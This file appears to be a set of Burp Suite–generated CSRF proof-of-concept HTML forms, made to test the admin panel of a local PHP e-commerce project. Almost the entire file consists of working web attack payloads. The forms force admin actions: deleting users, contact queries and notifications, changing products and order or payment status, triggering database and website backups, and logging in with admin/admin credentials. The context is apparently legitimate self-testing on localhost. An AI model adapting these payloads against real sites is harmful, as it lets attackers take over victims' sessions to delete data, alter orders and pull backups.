<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/admin1/categories.php">
		<input type="text" name="PHPSESSID" value="0576utoioacnef1qtfnohkcvbo">
		<input type="text" name="form_token_for_csrf" value="64ad87f5885d7">
		<input type="text" name="id" value="UWFkSlQ0azZ0MnQvLzlUQ09jSUhzZz09">
		<input type="text" name="operation" value="deactive">
		<input type="text" name="category_status_change" value="">
		<input type="submit" value="Send">
	</form>
</body>
</html>


<br>


<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/admin1/manage_categories.php?id=NGtqelZ3MXdhMjlpVHFpYzVkOWZGdz09">
		<input type="text" name="id" value="NGtqelZ3MXdhMjlpVHFpYzVkOWZGdz09">
		<input type="text" name="PHPSESSID" value="7s1868r35v5om1u7tirpta23mr">
		<input type="text" name="form_token_for_csrf" value="64adc0b468be8">
		<input type="text" name="categories" value="sssssssslopi123">
		<input type="text" name="submit" value="">
		<input type="submit" value="Send">
	</form>
</body>
</html>



<br>



<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/admin1/manage_products.php">
		<input type="text" name="PHPSESSID" value="7s1868r35v5om1u7tirpta23mr">
		<input type="text" name="form_token_for_csrf" value="64b4288529265">
		<input type="text" name="categories_id" value="ME1nTmo2WC95MjlaWW1aRlNudHNmUT09">
		<input type="text" name="name" value="ttt1230">
		<input type="text" name="mrp" value="2">
		<input type="text" name="price" value="2">
		<input type="text" name="qty" value="2">
		<input type="text" name="short_desc" value="sds">
		<input type="text" name="description" value="sds">
		<input type="text" name="meta_title" value="">
		<input type="text" name="meta_desc" value="">
		<input type="text" name="meta_keyword" value="">
		<input type="text" name="filename" value="scotch-club-logo.png">
		<input type="text" name="image" value="PNG">
		<input type="text" name="submit" value="">
		<input type="submit" value="Send">
	</form>
</body>
</html>


<br>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/admin1/manage_products.php?id=enhmSVQ3UjFYRCtmaHJIQXA4NkFYZz09">
		<input type="text" name="id" value="enhmSVQ3UjFYRCtmaHJIQXA4NkFYZz09">
		<input type="text" name="PHPSESSID" value="7s1868r35v5om1u7tirpta23mr">
		<input type="text" name="form_token_for_csrf" value="64b42a27b7c62">
		<input type="text" name="categories_id" value="ME1nTmo2WC95MjlaWW1aRlNudHNmUT09">
		<input type="text" name="name" value="sx1230">
		<input type="text" name="mrp" value="30">
		<input type="text" name="price" value="3">
		<input type="text" name="qty" value="4">
		<input type="text" name="short_desc" value="sds">
		<input type="text" name="description" value="sds">
		<input type="text" name="meta_title" value="">
		<input type="text" name="meta_desc" value="">
		<input type="text" name="meta_keyword" value="">
		<input type="text" name="filename" value="">
		<input type="text" name="image" value="">
		<input type="text" name="submit" value="">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>Users</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/admin1/users.php">
		<input type="text" name="PHPSESSID" value="06fn1p0kacdo8b6nbug9s9kutn">
		<input type="text" name="form_token_for_csrf" value="64b4687964b54">
		<input type="text" name="id" value="VEZvVlQ4Tmc3V1lpZTRnNjJxay9Odz09">
		<input type="text" name="user_delete" value="">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>Careers</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/admin1/careers.php">
		<input type="text" name="PHPSESSID" value="06fn1p0kacdo8b6nbug9s9kutn">
		<input type="text" name="form_token_for_csrf" value="64b468eed2787">
		<input type="text" name="id" value="bE9nYXhpaXh0aDlGRm1mMXo3SjJ5dz09">
		<input type="text" name="career_application_delete" value="">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>Contact Us</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/admin1/contact_us.php">
		<input type="text" name="PHPSESSID" value="06fn1p0kacdo8b6nbug9s9kutn">
		<input type="text" name="form_token_for_csrf" value="64b4693462ae4">
		<input type="text" name="id" value="VEZvVlQ4Tmc3V1lpZTRnNjJxay9Odz09">
		<input type="text" name="customer_query_delete" value="">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>Partners</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/admin1/partners.php">
		<input type="text" name="PHPSESSID" value="06fn1p0kacdo8b6nbug9s9kutn">
		<input type="text" name="form_token_for_csrf" value="64b46969b250c">
		<input type="text" name="id" value="VEZvVlQ4Tmc3V1lpZTRnNjJxay9Odz09">
		<input type="text" name="partnership_request_delete" value="">
		<input type="text" name="form_token_for_csrf" value="64b46969b250c">
		<input type="text" name="id" value="aEdKa2RMRXRFNlFoUXhuL3U5ZENodz09">
		<input type="text" name="form_token_for_csrf" value="64b46969b250c">
		<input type="text" name="id" value="NXFsNmZTVTNTZmV1WXBiRkU1QXBhZz09">
		<input type="text" name="form_token_for_csrf" value="64b46969b250c">
		<input type="text" name="id" value="aHNlT0ZCSXkrZWR4aVI0c0RBNFdNZz09">
		<input type="text" name="form_token_for_csrf" value="64b46969b250c">
		<input type="text" name="id" value="a1VKTWtzYUYwRXk2enZvSnpPVEM5Zz09">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>Notifications</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/admin1/notifications.php">
		<input type="text" name="PHPSESSID" value="06fn1p0kacdo8b6nbug9s9kutn">
		<input type="text" name="form_token_for_csrf" value="64b4699eb7f60">
		<input type="text" name="id" value="YVBFNTRTUGQ0TkU4UzhaYk1DM1dNZz09">
		<input type="text" name="notification_delete" value="">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>Login Admin</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/admin1/login.php">
		<input type="text" name="PHPSESSID" value="qjoskjbeq9fqgi0gd071d86nav">
		<input type="text" name="username" value="admin">
		<input type="text" name="password" value="admin">
		<input type="text" name="submit" value="">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>Logout Admin</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="GET" action="http://localhost:80/BhaskarProject/ecommerce%20website/admin1/logout.php">
		<input type="text" name="PHPSESSID" value="mvameujp4g6t29ojgagd0memge">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>New/Bug Fixed Logout Admin</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/admin1/logout.php">
		<input type="text" name="PHPSESSID" value="mvameujp4g6t29ojgagd0memge">
		<input type="text" name="form_token_for_csrf" value="64b7b8adf2fcb">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>Backup Submit Database</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/admin1/backup.php">
		<input type="text" name="PHPSESSID" value="0als140cm86hmrpkgje4993rti">
		<input type="text" name="form_token_input" value="64b7ba6e727fb">
		<input type="text" name="create_database_backup" value="">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>Backup Submit Website</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/admin1/backup.php">
		<input type="text" name="PHPSESSID" value="1pomn4ic2m4s8prr5c1vhnmu6e">
		<input type="text" name="form_token_for_csrf" value="64b7c8007eff8">
		<input type="text" name="create_website_backup" value="">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>Download Invoice</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="GET" action="http://localhost:80/BhaskarProject/ecommerce%20website/admin1/download_invoice.php?id=bUFpb21RbnNWVGJicDVTWmVKUkV4Zz09">
		<input type="text" name="id" value="bUFpb21RbnNWVGJicDVTWmVKUkV4Zz09">
		<input type="text" name="PHPSESSID" value="kaarctdlmednjrcoj99l65o783">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>Order Master Details: Update Payment Status</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/admin1/order_master_details.php?id=bUFpb21RbnNWVGJicDVTWmVKUkV4Zz09">
		<input type="text" name="id" value="bUFpb21RbnNWVGJicDVTWmVKUkV4Zz09">
		<input type="text" name="PHPSESSID" value="kaarctdlmednjrcoj99l65o783">
		<input type="text" name="update_payment_status" value="failure">
		<input type="text" name="submit" value="">
		<input type="submit" value="Send">
	</form>
</body>
</html>

<h1>Order Master Details: Update Order Status</h1>
<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="http://localhost:80/BhaskarProject/ecommerce%20website/admin1/order_master_details.php?id=bUFpb21RbnNWVGJicDVTWmVKUkV4Zz09">
		<input type="text" name="id" value="bUFpb21RbnNWVGJicDVTWmVKUkV4Zz09">
		<input type="text" name="PHPSESSID" value="kaarctdlmednjrcoj99l65o783">
		<input type="text" name="update_order_status" value="aEdKa2RMRXRFNlFoUXhuL3U5ZENodz09">
		<input type="text" name="submit" value="">
		<input type="submit" value="Send">
	</form>
</body>
</html>